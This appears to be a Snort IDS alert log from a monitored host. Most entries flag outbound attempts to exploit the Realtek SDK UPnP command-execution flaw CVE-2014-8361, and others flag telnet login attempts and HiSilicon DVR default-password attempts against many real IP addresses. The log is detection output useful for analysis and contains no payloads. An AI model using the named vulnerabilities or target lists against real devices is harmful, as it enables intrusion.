Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48242 -> 185.235.183.253:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46162 -> 45.158.23.74:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46162 -> 45.158.23.74:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40690 -> 45.41.82.143:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40690 -> 45.41.82.143:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58606 -> 45.121.57.43:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58606 -> 45.121.57.43:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 45.129.250.218:23 -> 192.168.2.23:59974
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 45.129.250.218:23 -> 192.168.2.23:59974
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46032 -> 185.241.253.189:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46032 -> 185.241.253.189:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46074 -> 185.241.253.189:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 96.1.55.62:23 -> 192.168.2.23:41814
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 96.1.55.62:23 -> 192.168.2.23:41814
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 95.70.173.39:23 -> 192.168.2.23:52254
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 95.70.173.39:23 -> 192.168.2.23:52254
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37106 -> 45.115.240.54:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37106 -> 45.115.240.54:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42900 -> 45.115.241.34:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42900 -> 45.115.241.34:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 121.149.84.42:23 -> 192.168.2.23:50156
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 121.149.84.42:23 -> 192.168.2.23:50156
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60472 -> 45.43.239.34:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60472 -> 45.43.239.34:52869
Source: Traffic	Snort IDS: 477 ICMP Source Quench 91.118.47.33: -> 192.168.2.23:
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.43.161.112:23 -> 192.168.2.23:47610
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.43.161.112:23 -> 192.168.2.23:47610
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:41956 -> 96.1.55.62:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45126 -> 91.76.228.152:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45126 -> 91.76.228.152:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45128 -> 91.76.228.152:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40422 -> 45.45.156.169:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40422 -> 45.45.156.169:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41518 -> 45.138.71.37:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41518 -> 45.138.71.37:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40458 -> 45.45.156.169:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40066 -> 45.41.80.55:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40066 -> 45.41.80.55:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 60.32.72.62:23 -> 192.168.2.23:56504
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 69.89.96.62:23 -> 192.168.2.23:47262
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 69.89.96.62:23 -> 192.168.2.23:47262
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38432 -> 45.42.87.208:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38432 -> 45.42.87.208:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37744 -> 45.126.244.188:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37744 -> 45.126.244.188:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47506 -> 45.125.110.122:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47506 -> 45.125.110.122:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37772 -> 45.126.244.188:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51020 -> 45.41.91.106:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51020 -> 45.41.91.106:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56010 -> 45.126.79.119:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56010 -> 45.126.79.119:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.183.97.91:23 -> 192.168.2.23:43140
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.183.97.91:23 -> 192.168.2.23:43140
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 96.1.55.62:23 -> 192.168.2.23:41956
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 96.1.55.62:23 -> 192.168.2.23:41956
Source: Traffic	Snort IDS: 716 INFO TELNET access 179.53.226.31:23 -> 192.168.2.23:56128
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44306 -> 45.195.68.7:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44306 -> 45.195.68.7:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46352 -> 185.207.92.155:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46352 -> 185.207.92.155:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46356 -> 185.207.92.155:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57132 -> 45.117.146.190:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57132 -> 45.117.146.190:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49514 -> 45.126.231.84:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49514 -> 45.126.231.84:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55466 -> 185.215.47.33:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55466 -> 185.215.47.33:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55478 -> 185.215.47.33:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:52582 -> 95.70.173.39:23
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.23.114.190:23 -> 192.168.2.23:38326
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38992 -> 45.41.84.234:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38992 -> 45.41.84.234:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52500 -> 45.207.63.70:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52500 -> 45.207.63.70:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39220 -> 91.78.184.130:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39220 -> 91.78.184.130:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58710 -> 185.68.233.140:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58710 -> 185.68.233.140:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39230 -> 91.78.184.130:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39212 -> 45.84.90.188:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39212 -> 45.84.90.188:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39268 -> 45.84.90.188:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49580 -> 185.216.251.45:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49580 -> 185.216.251.45:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49590 -> 185.216.251.45:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 45.129.250.218:23 -> 192.168.2.23:60260
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 45.129.250.218:23 -> 192.168.2.23:60260
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58722 -> 185.68.233.140:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 14.43.161.112:23 -> 192.168.2.23:48028
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 96.1.55.62:23 -> 192.168.2.23:42094
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 96.1.55.62:23 -> 192.168.2.23:42094
Source: Traffic	Snort IDS: 716 INFO TELNET access 179.53.226.31:23 -> 192.168.2.23:56282
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52496 -> 45.121.83.85:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52496 -> 45.121.83.85:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34740 -> 45.33.245.220:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34740 -> 45.33.245.220:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37836 -> 45.121.83.31:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37836 -> 45.121.83.31:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 95.70.173.39:23 -> 192.168.2.23:52582
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 95.70.173.39:23 -> 192.168.2.23:52582
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41964 -> 45.127.162.203:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41964 -> 45.127.162.203:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34188 -> 91.78.90.199:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34188 -> 91.78.90.199:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34206 -> 91.78.90.199:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 179.53.226.31:23 -> 192.168.2.23:56396
Source: Traffic	Snort IDS: 716 INFO TELNET access 199.195.203.26:23 -> 192.168.2.23:50488
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 121.149.84.42:23 -> 192.168.2.23:50570
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 121.149.84.42:23 -> 192.168.2.23:50570
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54260 -> 45.127.160.198:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54260 -> 45.127.160.198:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36384 -> 45.115.230.19:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36384 -> 45.115.230.19:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.43.161.112:23 -> 192.168.2.23:48028
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.43.161.112:23 -> 192.168.2.23:48028
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36390 -> 45.115.230.19:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 96.1.55.62:23 -> 192.168.2.23:42290
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 96.1.55.62:23 -> 192.168.2.23:42290
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43008 -> 185.71.66.37:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43008 -> 185.71.66.37:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58074 -> 185.68.235.164:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58074 -> 185.68.235.164:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33330 -> 185.241.252.11:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33330 -> 185.241.252.11:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43020 -> 185.71.66.37:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33336 -> 185.241.252.11:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58086 -> 185.68.235.164:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57434 -> 45.41.81.88:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57434 -> 45.41.81.88:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36334 -> 45.115.237.177:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36334 -> 45.115.237.177:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 187.36.239.157:23 -> 192.168.2.23:50610
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53630 -> 45.120.111.144:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53630 -> 45.120.111.144:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:32950 -> 185.113.135.92:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:32950 -> 185.113.135.92:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:32954 -> 185.113.135.92:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53666 -> 45.120.111.144:52869
Source: Traffic	Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 91.157.41.54: -> 192.168.2.23:
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49468 -> 45.207.218.8:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49468 -> 45.207.218.8:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 179.53.226.31:23 -> 192.168.2.23:56432
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54854 -> 91.78.36.71:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54854 -> 91.78.36.71:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54870 -> 91.78.36.71:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47720 -> 45.33.249.43:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47720 -> 45.33.249.43:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58442 -> 45.254.26.24:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58442 -> 45.254.26.24:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 41.224.9.14:23 -> 192.168.2.23:37438
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:39384 -> 201.39.12.10:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58464 -> 45.254.26.24:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 45.129.250.218:23 -> 192.168.2.23:60530
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 45.129.250.218:23 -> 192.168.2.23:60530
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37548 -> 45.41.92.13:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37548 -> 45.41.92.13:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48540 -> 45.123.199.215:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48540 -> 45.123.199.215:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45252 -> 185.37.99.98:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45252 -> 185.37.99.98:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44566 -> 45.41.83.187:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44566 -> 45.41.83.187:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45262 -> 185.37.99.98:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48256 -> 45.125.111.73:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48256 -> 45.125.111.73:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 96.1.55.62:23 -> 192.168.2.23:42352
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 96.1.55.62:23 -> 192.168.2.23:42352
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 116.0.4.98:23 -> 192.168.2.23:34390
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38350 -> 91.200.122.185:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36796 -> 91.78.50.249:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36796 -> 91.78.50.249:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 103.147.146.131:23 -> 192.168.2.23:45806
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36826 -> 91.78.50.249:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56444 -> 45.115.236.157:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56444 -> 45.115.236.157:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 95.70.173.39:23 -> 192.168.2.23:52806
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 95.70.173.39:23 -> 192.168.2.23:52806
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60564 -> 45.41.83.108:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60564 -> 45.41.83.108:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44474 -> 45.123.197.160:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44474 -> 45.123.197.160:52869
